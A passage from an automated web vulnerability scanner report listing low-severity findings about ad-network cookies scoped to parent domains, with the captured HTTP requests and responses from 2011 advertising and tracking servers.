01AI=2-2-A613C146A4736A716F4D563A34B5D402C7BA932EC779FA1D725AE50B42520B13-0DAEBB211BD7A29494C620D149AAF250AA6D442562DF8AB17EF05264F499A2C6; expires=Fri, 20-Jul-2012 18:00:45 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/a.collective-media.net?U=%2fadj%2fcm.yearbook%2fford_ron_071911%3bsz%3d300x250%3bord%3d1520731557&V=3-G5fcgDY0K3hFm3ldA+%2fy6KwFR25uNIa1mtl6VUOPdb5zr8GDoD5k4K14vzGx70Ug&I=ED7C7B6613CBE56&D=collective-media.net&01AD=1&01UE=1& HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: 01AI=2-2-1E827F04C6705B6FCA1301006334695B1B7A7729C56E4C71AB675E1C5AD45C6E-BD27E52C5C338592D4867470B9A5F9A356B7B934D9BF4EFC1837F46B4F04D82A

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a.collective-media.net/adj/cm.yearbook/ford_ron_071911;sz=300x250;ord=1520731557?01AD=3Jy4_TUjNJFJGrFgI2LPcW1XUxOYYzqE7vfPlqbLUxkO-MYMgLyRKWA&01RI=ED7C7B6613CBE56&01NA=
Expires: Thu, 21 Jul 2011 18:00:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:00:45 GMT
Connection: close
Set-Cookie: 01AI=2-2-A613C146A4736A716F4D563A34B5D402C7BA932EC779FA1D725AE50B42520B13-0DAEBB211BD7A29494C620D149AAF250AA6D442562DF8AB17EF05264F499A2C6; expires=Fri, 20-Jul-2012 18:00:45 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.25. http://ak1.abmr.net/is/showadsak.pubmatic.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/showadsak.pubmatic.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-C348B449BBBE2539E1034A1118A6E3787EA82F63D62D2C7F76953C22B7935737-FC8D49F470734A3C14F1D42B61C930E1D47B1B667E68FC6791CBD9ED9615B659; expires=Fri, 20-Jul-2012 18:00:55 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/showadsak.pubmatic.com?U=/AdServer/AdServerServlet&V=3-pw+1ZxT1rBwXqrTpzaip9ehiO02fhOYnHQidbInwMp1WqyAkOqoT0yb9pGSEwXLrqUff5M7c2Xk%3d&I=C3601E09227A422&D=showadsak.pubmatic.com&01AD=1&operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: ak1.abmr.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: 01AI=2-2-2CC9B80FAB86FB1CFBAAC56B5D99FE4CB652156FA83C2155031E4F7427622925-96B2F820B658685932343A1EDA6EB085845A6AF297A5F1357F2E9645E1A26BC1

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://showadsak.pubmatic.com/AdServer/AdServerServlet?01AD=3B3Mse5FVo2PLrOQXf0PVRQ0MOlq6NGrWxVZb7vb-7UJ0qTWr-2pBdQ&01RI=C3601E09227A422&01NA=&operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0
Expires: Thu, 21 Jul 2011 18:00:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Jul 2011 18:00:55 GMT
Connection: close
Set-Cookie: 01AI=2-2-C348B449BBBE2539E1034A1118A6E3787EA82F63D62D2C7F76953C22B7935737-FC8D49F470734A3C14F1D42B61C930E1D47B1B667E68FC6791CBD9ED9615B659; expires=Fri, 20-Jul-2012 18:00:55 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.26. http://amch.questionmarket.com/adsc/d922005/24/42823090/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42823090/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Fri, 23 Jul 2010 13:19:25 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42823090-24-1; expires=Wed, 12 Sep 2012 05:19:26 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-1; expires=Wed, 12-Sep-2012 05:19:26 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d922005/24/42823090/decide.php?ord=1311427172 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12;sz=300x250;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/2080163699/x25/DCI/6748_HewlettPackard_D_819486339/07212011_HP_6748_DCI_1stImpRdBlk_300x250_12_17205266.html/7263485738303471796b67414345734b?;ord=2080163699?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ST=908257_; CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:26 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b203.dl
Set-Cookie: CS1=deleted; expires=Fri, 23 Jul 2010 13:19:25 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42823090-24-1; expires=Wed, 12 Sep 2012 05:19:26 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-1; expires=Wed, 12-Sep-2012 05:19:26 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.27. http://amch.questionmarket.com/adsc/d922005/24/42823584/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42823584/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Fri, 23 Jul 2010 13:43:47 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1_42823584-24-2; expires=Wed, 12 Sep 2012 05:43:48 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_921394-[^j@M-0_922005-e^j@M-/G; expires=Wed, 12-Sep-2012 05:43:48 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d922005/24/42823584/decide.php?ord=1311428633 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16;sz=728x90;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/science_technology/L37/1987870436/TopLeft/DCI/6748_HewlettPackard_D_819486366/07212011_HP_6748_CT_Tech_728x90_16_17205320.html/7263485738303471796b67414345734b?;ord=1987870436?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ST=908257_; CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-0_921394-[^j@M-0

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:43:48 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: CS1=deleted; expires=Fri, 23 Jul 2010 13:43:47 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1_42823584-24-2; expires=Wed, 12 Sep 2012 05:43:48 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_921394-[^j@M-0_922005-e^j@M-/G; expires=Wed, 12-Sep-2012 05:43:48 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.28. http://amch.questionmarket.com/adsc/d922005/24/42823586/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42823586/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Fri, 23 Jul 2010 13:19:25 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42823586-24-2; expires=Wed, 12 Sep 2012 05:19:26 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-1; expires=Wed, 12-Sep-2012 05:19:26 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d922005/24/42823586/decide.php?ord=1311427171 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10;sz=728x90;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php/L18/95226291/TopLeft/DCI/6748_HewlettPackard_D_819486335/07212011_HP_6748_DCI_1stImpRdBlk_728x90_10_17205259.html/7263485738303471796b67414345734b?;ord=95226291?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ST=908257_; CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:26 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: CS1=deleted; expires=Fri, 23 Jul 2010 13:19:25 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42823586-24-2; expires=Wed, 12 Sep 2012 05:19:26 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_855789-fKz.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0_844890-@Jz:M-0I_916114-K0/:M-0_910475-*S>.M-9eU2_900515-f}I<M-0_907755-rWF*M-2r34_913745-C8[.M-n2S2_847178-kQY<M-0_880216-T!t<M-j1_883822-*dG=M-d_881014-8|L=M-OaA_903695-!pj=M-ao_908257-Vf?<M-|]62_885995-9XD@M-)4_922005-e^j@M-1; expires=Wed, 12-Sep-2012 05:19:26 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.29. http://amch.questionmarket.com/adsc/d922005/24/42825515/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d922005/24/42825515/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CS1=deleted; expires=Fri, 23 Jul 2010 13:43:47 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-4_42061906-3-3_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1_39959888-33-1_39959895-33-2_39959897-33-1_42349685-10-1_600001476377-3-1_904435-22-1_600001476361-11-1_914172-2-1_873120-33-1_42157070-4-2_42158466-4-1_915628-8-1_200218320875-12-1_200218321074-12-1_881258-5-2_881252-5-1_881250-3-9_881251-4-1_881271-6-3_400007520088-6-1_400007608838-6-1_922544-8-3_921566-8-1_41851016-5-3_36412907-5-3_36394329-5-2_42825637-24-1_42853597-2-1_42825515-24-2; expires=Wed, 12 Sep 2012 05:43:48 GMT; path=/; domain=.questionmarket.com
